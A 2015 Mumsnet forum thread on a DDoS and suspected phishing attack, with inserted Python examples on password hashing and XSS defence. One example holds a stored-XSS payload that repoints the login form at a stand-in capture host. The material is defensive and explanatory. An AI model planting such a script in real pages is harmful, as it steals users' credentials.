
More about the Technical side of the attacks on Mumsnet

720 replies

JustineMumsnet · 19/08/2015 11:17

Hi all,
There have been, understandably, a lot of questions about the tech side of the attack on Mumsnet, so here, courtesy of the tech team, is some more detail. We obviously do have to be a bit careful with the details because we don't want to give away information that could help other hackers. Whilst it's true that "security through obscurity" isn't real security, we have no wish to make it easier for a future attacker.

We've spent a lot of time since the attacks began proactively defending against them, minimising their impact and protecting against future attacks. With a busy site like Mumsnet there is a lot of information to go through. When we uncover a new snippet of information, perhaps a new suspicious user account, we have to go back to the start and reanalyse, so it can be slow going at times. We are working with our technology partners, who have a lot of experience of these kinds of attack, and we have used lots of the resources available to us.

Some aspects of our technology stack have already been extensively tested by external specialists. Some of our software code is quite old - nearly as old as Mumsnet itself - and things have moved on a lot over that time. However, we have a program of code review whereby all new code is checked by someone other than the person who created it. It's not perfect and everyone makes mistakes, but we take the quality of our code very seriously.

The Denial Of Service (DOS) attack against Mumsnet was a heavy, sustained attack which initially overwhelmed our ability to respond to legitimate requests. Mumsnet might typically get something like 50-100 requests per second. During the attack we were getting around 17,000 requests per second. Each request carried more data than is normal as well.

The hacking attack on our website was separate from the DOS, though we believe perpetrated by the same person or people. We follow many of the industry's best practices, such as using HTTPS for our login pages, keeping our database separate from our cluster of web servers and not accessible from the internet, and so on. We don't necessarily use the same standards of security as say your online banking service might use, for example requiring multiple passwords or using two factor authentication. We try to balance security against usability and the sensitivity of the information we hold. After all, as pointed out by one of you in an earlier thread, the majority of information we have about a user is what that user publishes in Talk, which is there for all to see.

As has been mentioned several times, we keep our passwords encrypted and we use the recommended algorithms for this, with high "strength" settings. This means that if someone somehow obtained the password data from our database they wouldn't be able to make any use of them - they wouldn't work on our site or on any other site even if the user used the same password on that other site. This remains the case even for MNHQ staff; they cannot un-encrypt the passwords either.

We are now pretty confident it was a phishing attack. Phishing, where a hacker gets a user to enter their username and password into a form from which they can capture that information, fits all the data we have. The hacker doesn't need to decrypt anything, because they capture the password in the browser as it is entered (either by typing it, or if it was automatically remembered by the user's browser or password manager). The list of passwords that has been published includes some that users have identified as being ones that they've mistyped. Our database wouldn't have mistyped ones, only accurate ones, whereas those collected by recording what a user submits would and does contain errors.

It's not obvious how it has been conducted though. We have been able to create a proof of concept which shows that it could work, but that relies on some steps that would be difficult or virtually impossible for a hacker. Phishing attacks sometimes use social engineering to "trick" people into using the fake website rather than the real one, but again, for various reasons, we can rule some of these out. Other phishing attacks are more technical and use other means to get people to visit the fake page. One such example is Cross Site Scripting (XSS). XSS is ranked number three on the Open Web Application Security Project's top ten list of web site security problems. If the hacker can get the website to put his own code on pages which are to be viewed by other users, s/he can modify the page to redirect the login process to their own site: a page which looks just like our login page but is actually recording the details and sending them to the hacker. Also possible, but even less likely, is modifying our login page to submit the details to the hacker as well as to us. If the hacker had gained access to our Content Management System he could have done the former, though not the latter. However, we record all changes that are made and there are no suspicious ones.

It's impossible for us to know how many users' passwords have been collected. It's a reasonable assumption, and our working one, that the passwords of everybody who has logged in since 6th August 2015, and possibly some time before that, have been collected.

In light of the attacks, we've bolstered some aspects of our security, particularly around our administrative functions. We have further changes planned and will be working on these in the coming days.

Forcing everyone to reset their password, as we have done, would render the list useless provided that users don't choose the same new password and they've not used the same username and password elsewhere.

Some users have questioned why certain other changes aren't being made already, such as a move to enforcing stricter passwords, which makes sense. However, given how crucial the part of our system that deals with passwords is, we have to be really cautious when making changes to it. We don't want to rush and end up creating bigger holes, but we will certainly take steps to encourage users to strengthen passwords as soon as practicable.

Any questions do post here - we'll answer as transparently as we can - bearing in mind the caveat about helping future hackers mentioned earlier.

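The two points in the MNHQ post about password storage and about mistyped entries in the phished list can be shown together in working code. What follows is an added example, not Mumsnet's code: PBKDF2-HMAC-SHA256 from the Python standard library stands in for whatever KDF the site actually uses, and the user table, passwords and leaked list are all constructed for the example. The triage function is the kind of check an incident responder would run over a published list: an entry that verifies against the stored hash is an account that is genuinely exposed, an entry that does not is a mistype or a username that does not exist, and a list containing such entries is what a form capture produces, not a database dump.

```python
"""Added example (not Mumsnet's code). It demonstrates two points from the
post above:

1. Passwords stored as a salted, slow hash can be checked but not reversed,
   so a copy of the database gives neither MNHQ nor a thief the passwords.
2. A phishing page records what the user typed, mistypes included, so a
   phished list can be triaged against the stored hashes: entries that
   verify are accounts that are really exposed, entries that do not are
   mistypes (or accounts that do not exist), which is exactly the pattern
   the post describes.

Assumptions: PBKDF2-HMAC-SHA256 from the standard library stands in for
whatever KDF the site actually uses, and both the user table and the
leaked list below are constructed for the example.
"""
import hashlib
import hmac
import os

ITERATIONS = 600_000  # OWASP's 2023 minimum for PBKDF2-HMAC-SHA256


def hash_password(password: str, salt: bytes = b"") -> str:
    """Return a self-describing string: algorithm$iterations$salt$digest."""
    salt = salt or os.urandom(16)  # fresh random salt per password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(candidate: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iters, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError(f"unsupported hash format: {algo}")
    calc = hashlib.pbkdf2_hmac("sha256", candidate.encode("utf-8"),
                               bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(calc, bytes.fromhex(digest_hex))


# Constructed user table: the site keeps only these strings, never the passwords.
USERS = {
    "BertieBotts": hash_password("correct horse battery staple"),
    "Kleptronic": hash_password("Sp4rkl3-Pony!"),
    "akkakk": hash_password("router-reboot-2015"),
}

# Constructed phished list: username and whatever was submitted to the fake form.
LEAKED = [
    ("BertieBotts", "correct horse battery staple"),  # typed correctly
    ("Kleptronic", "Sp4rkl3-Pony!!"),                 # extra character: a mistype
    ("Kleptronic", "Sp4rkl3-Pony!"),                  # second attempt, correct
    ("akkakk", "router-rebot-2015"),                  # mistype only
    ("nosuchuser", "whatever"),                       # not an account here at all
]


def triage_leak(leaked, users):
    """Classify each leaked pair against the stored hashes.

    Returns the usernames whose real password appears in the list, plus
    counts of mistyped entries and of usernames that are not accounts."""
    compromised, mistyped, unknown = set(), 0, 0
    for username, submitted in leaked:
        if username not in users:
            unknown += 1
        elif verify_password(submitted, users[username]):
            compromised.add(username)
        else:
            mistyped += 1
    return {"compromised": sorted(compromised), "mistyped": mistyped, "unknown": unknown}


REPORT = triage_leak(LEAKED, USERS)

if __name__ == "__main__":
    print(REPORT)
```

Two things the output makes concrete. Only BertieBotts and Kleptronic come out as compromised, yet a forced reset for everyone is still the right call, because a mistyped entry such as "router-rebot-2015" tells an attacker nearly all of the real password. And because verifying one candidate costs a full KDF run, the same property that lets the responder check a short list is what makes bulk recovery of passwords from a stolen table impractical.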
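The XSS route in the MNHQ post has two variants: a script planted in user content that repoints the login form at a capture site, and a direct edit of the login page itself. The following is an added example, not Mumsnet's code, with SITE_HOST, the payload and the page fragments all constructed for illustration. It shows why escaping post bodies on output stops the first variant, and gives a check that a monitoring job could run against the login page as served, flagging any form action or script source that leaves the site's own host.

```python
"""Added example for the XSS paragraph above (not Mumsnet's code). It shows
the stored-XSS route the post describes, a script in user content that
repoints the login form at a capture site, why escaping post bodies on
output stops it, and a check that a monitoring job could run on the login
page as served: every form action and script source must stay on the
site's own host. SITE_HOST, the payload and the page fragments are
constructed for the example."""
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "www.mumsnet.com"  # assumption: the host the login form should post to

# Constructed attacker post body: at runtime it rewrites where the login form submits.
PAYLOAD = ('<script>document.forms["login"].action = '
           '"https://login-mumsnet.example/collect";</script>')


def render_post(body: str, escape: bool) -> str:
    """Render a Talk post into the page. escape=False is the injectable version."""
    content = html.escape(body) if escape else body
    return f'<div class="post">{content}</div>'


class OriginAudit(HTMLParser):
    """Collect form actions and external script sources that leave the site's host."""

    def __init__(self, host: str):
        super().__init__()
        self.host = host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: v or "" for k, v in attrs}
        if tag == "form":
            self._check("form action", a.get("action", ""))
        elif tag == "script" and a.get("src"):
            self._check("script src", a["src"])

    def _check(self, what: str, url: str) -> None:
        host = urlparse(url).netloc.lower()
        if host and host != self.host:  # relative URLs stay on the site
            self.findings.append((what, url))


def audit_page(page_html: str, host: str = SITE_HOST):
    """Return [(what, url), ...] for every off-site form action or script src."""
    parser = OriginAudit(host)
    parser.feed(page_html)
    parser.close()
    return parser.findings


# Constructed login page as it should be served, and a tampered copy.
LOGIN_PAGE = ('<form name="login" action="/login" method="post">'
              '<input name="username"><input name="password" type="password">'
              '</form>')
TAMPERED_PAGE = LOGIN_PAGE.replace('action="/login"',
                                   'action="https://login-mumsnet.example/collect"')

if __name__ == "__main__":
    print(render_post(PAYLOAD, escape=True))
    print(audit_page(TAMPERED_PAGE))
```

The audit catches the second variant, a login page whose form has been edited to submit off-site, which is the one the post says CMS access could have enabled. It does not catch the first: an inline script has no src attribute and does its rewriting in the browser after the page is served, so a static scan of the HTML sees a clean form. That variant is stopped by escaping user content on output, with a Content-Security-Policy form-action directive restricting where forms may submit as the browser-side backstop.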
BertieBotts · 20/08/2015 20:43

I do think the chances of somebody

  • Knowing about the hack and seeking out the list
  • Knowing that you are a mumsnetter and wanting to know what your username is
  • Knowing your IP address
  • Knowing how to put those together to search
  • Being totally unfamiliar with mumsnet yet immediately working out the search options
  • Finding anything useful after searching, given that AS only returns 500 results maximum, and most of us post a load of boring arbitrary shit like how often you wash your towels and advice on the best texture of mashed carrot for a baby and "that made me spit tea on my keyboard" in far higher numbers than anything juicy

Are really, really low.

Kleptronic · 20/08/2015 20:43

They'd have to be really very keen to look, SouthAmericanCuisine, and they'd have to make suppositions, as in they couldn't definitively prove it was you, but I suppose they could surmise from details in posts.

IP addresses are as I am sure you already know dynamically assigned, although in reality they tend to last months if you always leave your router on.

If you find out the IP address you are currently using, you can check if it is the same as the one linked to your username on the list. How depends on the type of computer you're using (you can Google how to do it, it's not too complicated). Don't tell us what type of computer you're using. Just in case, like :).

akkakk · 20/08/2015 20:46

SouthAmericanCuisine
If someone knows your IP address
And sees it on the list linked to a specific username
then yes definitely - they would know that the username had been on that IP address when phished - and by assumption it is likely that the username was you...

however, most people have no idea what their IP address is at any time (your boss might if from work and a fixed IP address - but then it could be any person at work posting, though content might give it away...) It is why I recommended early on that if worried users should turn off and turn back on their routers to pick up a new IP address to help reduce any matching...

why would your DC / spouse know the IP - they might, but in most families they won't - this is the IP of you on broadband given to you by your broadband supplier while on their network and only seen generally by servers - not your internal IP of your device... very different things...

as to MNHQ deleting posting histories - I doubt they will do it generally, posts are public and to remove them would be to make it difficult to read threads, if someone has posted identifying information then it could be tracked even without knowing usernames etc. However if there is a reason they might - always worth asking them if concerned...

akkakk · 20/08/2015 20:49

kleptronic
IP address in this context is totally separate to type of computer :)
go to: ip-lookup.net/ and it will show you your broadband IP - which is all that is seen online...

the IP relating to your computer / device is its IP on the internal network - usually assigned by the router - you have two networks, internal and the world... the router bridges them and hides the internal from the world, and allows the world through to the internal...

so this list had the broadband IP address, and has no idea what computer you are on or whether your internal IP is 192.168.0.1 or 192.168.0.20 (internal usually starts 192.168)

Kleptronic · 20/08/2015 21:01

You are so right akkakk I was thinking like I was in work, doh!

LaurieJuspeczyk · 20/08/2015 23:19

I really don't think anyone should be worried about IP addresses - as previous posters have said the chances that most people will be identified from that alone are virtually zero. My only worry would be that if they have people's email addresses, it's not impossible that those might be published alongside usernames at a later date. Again, though, as BertieBotts says, someone would have to know about the hack, find the list, search for your email specifically, trawl through all your posts looking for anything interesting... It's way too much effort for the average nosy person, I'd only be worried if you already have a stalker/vindictive ex etc or if you've posted anything that might completely ruin your life it if came to light.

Question for MNHQ/tech - as you (presumably!) don't own the phishing site the answer is probably no, but having found the problem, do you have any idea how many users are likely to have been affected?

Bettybooby · 20/08/2015 23:31

I'm sure people have asked already but what about the home addresses given to MN for product trials etc?

TheFlyingSimurgh · 20/08/2015 23:43

My IP address appears to be the corner of someone's back yard some miles away from me. I'm not greatly concerned by its publication.

G1veMeStrength · 20/08/2015 23:46

I'm sure MN said they keep those totally separately Bettybooby.

Mrsmorton · 20/08/2015 23:49

My IP address has me right in the middle of a very large Methodist church. I'm not a Methodist.

Garrick · 21/08/2015 00:02

Mine's 60 miles away Grin Either the geolocation services are only getting Sky's switch point, or GCHQ's rerouting all my activity. I'd like to think they care that much, but suspect it's the former.

I check this quite often - it's only been correct once, and down to 20 miles away a few times. For a while I appeared to be in Germany. I mean, the cops would be able to find me from my IP but they have to have a special kind of warrant to force Sky to hand over the information.

^^ Shiny Dave wants ISPs to have to give this info without the formal stuff. I'm not up to date with how that's going.

In more interesting hacker news, the Ashley Madison data has now been dumped in full. It's enormous, and just a dump, so needs a lot of processing. People are processing it, of course, and I'm sure you could find someone to search for your loved one for a fee.

Garrick · 21/08/2015 00:04

I'm not a Methodist. Grin Your router disapproves of drinking & swearing, though.

BertieBotts · 21/08/2015 00:20

Mine shows my country and ISP correctly, that's it. When I turn my VPN on it goes haywire.

boatsgoby · 21/08/2015 05:39

Please could MNHQ ask all users to delete PMs from their inbox? Many of us use the PM function to exchange addresses, tel. nos, more personal details, etc. We can delete our own PMs but the recipients need to delete theirs too.

Pranmasghost · 21/08/2015 07:45

I just deleted all inbox posts with some regret .

catsrus · 21/08/2015 08:15

Anything posted online in any forum or via email should be thought of as being written on the back of a post card. The internet really is just not that secure.

SouthAmericanCuisine · 21/08/2015 08:41

cats I tend to agree, but the anonymity of MN has been perpetuated over the years through the site "rules" - such as HQ being willing to delete posting histories if a person has been "outed" in RL. It gives the impression that our identities are secure, and it has encouraged us to believe that anonymity is the norm, here.

meditrina · 21/08/2015 09:11

cats - agree.

And that also touches on the myth of any part of MN being a 'safe space'.

CuttedUpPear · 21/08/2015 09:37

I changed my password as requested last night.

The reset page contained a spelling error, however.

Is this just a mistake made in haste - it feels like one of those things we're supposed to be on guard for.

SmallLegsOrSmallEggs · 21/08/2015 10:04

Is there any sign of the delete all for PMs?

I need to delete not only all my received, but sent also.

BoreOfWhabylon · 21/08/2015 10:19

There's a 'select all' button at the top of inbox and outbox.

Clicking then selects all on that page and you then click the dustbin to delete. Repeat for each page.

SmallLegsOrSmallEggs · 21/08/2015 10:55

Ah is that desktop only? Not seeing it on mobile.

Have sent a delete request anyway as I need deletion from other users inboxes too.

ticklemetipsy · 21/08/2015 11:27

I have seen I am on that list with my old user name. I am concerned as to how they managed to get my password, as I haven't used it for ages: Mumsnet was always logged on and I cannot remember the last time I had to log on to get on to Mumsnet. I have now deleted that account and set up a new one.

howtorebuild · 21/08/2015 12:23

www.urbandictionary.com/define.php?term=doxing his latest threat

BeccaMumsnet · 21/08/2015 13:17

@RustyParker

I'm not on the list but just remembered that a couple of days ago I had a notification from Facebook saying someone had requested a reset of my FB password. Could this be linked?

Hi RustyParker - we can't say for sure if this is linked. The best thing to do is just ignore and delete these emails. If you are concerned, you can change your email and password on your Facebook account to be sure and to stop the emails coming through.